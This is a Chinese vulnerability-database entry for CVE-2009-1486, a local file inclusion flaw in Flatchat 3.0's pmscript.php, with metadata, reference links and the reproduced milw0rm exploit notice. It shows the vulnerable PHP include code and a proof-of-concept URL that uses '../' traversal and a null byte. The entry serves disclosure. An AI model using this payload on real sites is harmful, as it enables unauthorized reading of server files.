Ninjadesigns Flatchat 'pmscript.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117651 漏洞类型 路径遍历
发布时间 2009-04-27 更新时间 2009-05-06
CVE编号 CVE-2009-1486 CNNVD-ID CNNVD-200904-549
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8549
https://www.securityfocus.com/bid/34734
https://cxsecurity.com/issue/WLB-2009040247
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-549
|漏洞详情
Flatchat3.0版本中的pmscript.php存在目录遍历漏洞。远程攻击者可以借助with参数(参数值设为'..'),包含和运行任意的本地文件。
|漏洞EXP
##########################################################################################
[+] Flatchat 3.0 (pmscript.php with) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.net
[+] www.h4cky0u.org
##########################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Local File Inclusion

  - Vulnerable code in pmscript.php

--------------------------------------------
$filename = 'users/'.$_GET['with'].'.php';

if (file_exists($filename)) {
    include($filename);
--------------------------------------------


    http://127.0.0.1/path/pmscript.php?with=../../../../../BOOTSECT.BAK%00

##########################################################################################

# milw0rm.com [2009-04-27]
|受影响的产品
Ninja Designs Flatchat 3.0
|参考资料

来源:MILW0RM
名称:8549
链接:http://www.milw0rm.com/exploits/8549
来源:SECUNIA
名称:34904
链接:http://secunia.com/advisories/34904